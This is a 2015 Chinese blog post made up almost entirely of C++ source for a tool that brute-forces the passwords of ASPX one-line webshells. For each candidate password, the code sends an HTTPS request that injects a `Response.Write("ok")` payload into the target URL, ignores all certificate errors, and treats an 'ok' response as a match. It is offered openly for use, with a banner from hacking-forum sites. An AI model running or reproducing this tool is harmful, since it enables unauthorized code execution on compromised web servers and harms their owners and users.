ASPX一句话爆破工具

#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include <string.h>
#include <string>
#include <winhttp.h>
#pragma comment(lib,"winhttp.lib")

void banner() //显示banner
{
	printf("[-]:Webshell Aspx crack T00ls\r\n[-]:Welcome www.90sec.org\r\n");
}

int _tmain(int argc, _TCHAR * argv [])
{
	DWORD dwsize = 0;
	LPSTR pszOutBuffer;
	LPBYTE lpHeader, lpData;
	LPCWSTR Host = argv[1];
	LPCWSTR Url = argv[2];
	char buf[MAX_PATH] = {0}; //fgets接收字符串
	FILE* fp;
	int i = 0;

	if (argc < 4) //如果入口长度小于4
	{
		banner();
		printf("[-]:%S Host Domain_Url Password_List\r\n",argv[0]);
		return 0;
	}

	if ((fp = _wfopen(argv[3],L"rb")) == NULL) //打开文件,如果不存在
	{
		printf("File not found\r\n"); //打印错误
		return 0;
	}
	while ((fgets(buf,MAX_PATH,fp))) //这儿注意,fgets读取文件,默认一行尾端会增加一个回车,我就是在这儿卡了一晚上
	{
		buf[strlen(buf) - 2] = '\0'; //倒数第二个字符,也就是回车,替换

	HINTERNET Hinternet = WinHttpOpen(L"HttpClient 1.0", //定义访问sessions
		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
		WINHTTP_NO_PROXY_NAME,
		WINHTTP_NO_PROXY_BYPASS,0);
	if (Hinternet == NULL) //如果定义访问的sessions为空
	{
		printf("Failed to Initialize http sessions\r\n");
		return 0;
	}

	HINTERNET Hconnect = WinHttpConnect(Hinternet, //初始化连接
		Host, //定义地址
		INTERNET_DEFAULT_HTTPS_PORT,//默认端口443
		0);

	if (Hconnect == NULL) //如果为空,就close winhttp句柄
	{
		printf("Hconnect error\r\n");
		WinHttpCloseHandle(Hinternet);
		return 0;
	}

	WCHAR* res = new WCHAR[MAX_PATH + 1]; //释放内存,准备写入数据
	wsprintf(res,L"%s?%S=Response.Write(\"ok\");Response.End()",Url,buf); //写入字符串到释放内存的变量里
	HINTERNET Hrequest = WinHttpOpenRequest(Hconnect, //准备传输,定义好格式
		L"GET",
		res,
		L"HTTP /1.1",
		WINHTTP_NO_REFERER,
		WINHTTP_DEFAULT_ACCEPT_TYPES,
		WINHTTP_FLAG_SECURE|WINHTTP_FLAG_REFRESH);

	if (Hrequest == NULL) 
	{
		WinHttpCloseHandle(Hinternet);
		WinHttpCloseHandle(Hconnect);
		return 0;
	}

	DWORD dwFlags;
	DWORD dwBuffLen = sizeof(dwFlags);           
	WinHttpQueryOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置查询选项
		(LPVOID)&dwFlags, &dwBuffLen);
	dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;
	dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
	dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;
	dwFlags |= SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;

	WinHttpSetOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置选项
		&dwFlags, sizeof (dwFlags) );

	if (WinHttpSendRequest(Hrequest, //发送数据
		WINHTTP_NO_ADDITIONAL_HEADERS,0,
		WINHTTP_NO_REQUEST_DATA,0,0,0) == FALSE)
	{
		DWORD err  = GetLastError();
		WinHttpCloseHandle(Hrequest);
		WinHttpCloseHandle(Hconnect);
		WinHttpCloseHandle(Hinternet);
		return 0;
	}

	if (WinHttpReceiveResponse(Hrequest,NULL) == FALSE) //开始读取相应
	{
		DWORD err = GetLastError();
		WinHttpCloseHandle(Hrequest);
		WinHttpCloseHandle(Hconnect);
		WinHttpCloseHandle(Hinternet);
		return 0;
	}

	DWORD dwSize = 0;
	if (!WinHttpQueryDataAvailable( Hrequest, &dwSize)) //检查是否还有数据接受
		printf( "Error %u in WinHttpQueryDataAvailable.\n",
		GetLastError());

	WinHttpQueryHeaders(Hrequest, //查看http响应头
		WINHTTP_QUERY_RAW_HEADERS_CRLF,
		WINHTTP_HEADER_NAME_BY_INDEX,NULL,
		&dwsize,WINHTTP_NO_HEADER_INDEX);
	lpHeader = (LPBYTE)HeapAlloc(GetProcessHeap(), 0, dwsize);

	WinHttpQueryHeaders(Hrequest, 
		WINHTTP_QUERY_RAW_HEADERS_CRLF, 
		WINHTTP_HEADER_NAME_BY_INDEX, 
		lpHeader, &dwsize, 
		WINHTTP_NO_HEADER_INDEX);
	HeapFree(GetProcessHeap(), 0, lpHeader);
	DWORD dwDownloaded = 0;
	pszOutBuffer = new char[dwSize+1];
	if (!pszOutBuffer)
	{
		printf("Out of memory\n");
	}

	ZeroMemory(pszOutBuffer, dwSize+1); 
	if (!WinHttpReadData( Hrequest, (LPVOID)pszOutBuffer, 
		dwSize, &dwDownloaded))
	{                                  
		printf( "Error %u in WinHttpReadData.\n", GetLastError());
	}
	if (strstr(pszOutBuffer,"ok"))
	{
		printf("Line:%d-->Find password Success:%s\n",++i,buf);
		return 0;
	}else
	{
		printf("Line:%d-->password Not found:%s\n",++i,buf);
	}
}
	delete[] pszOutBuffer;
	//delete[] res;
	return 0;
}

 

posted @ 2015-01-21 00:43  杀死比特  阅读(1014)  评论(0编辑  收藏  举报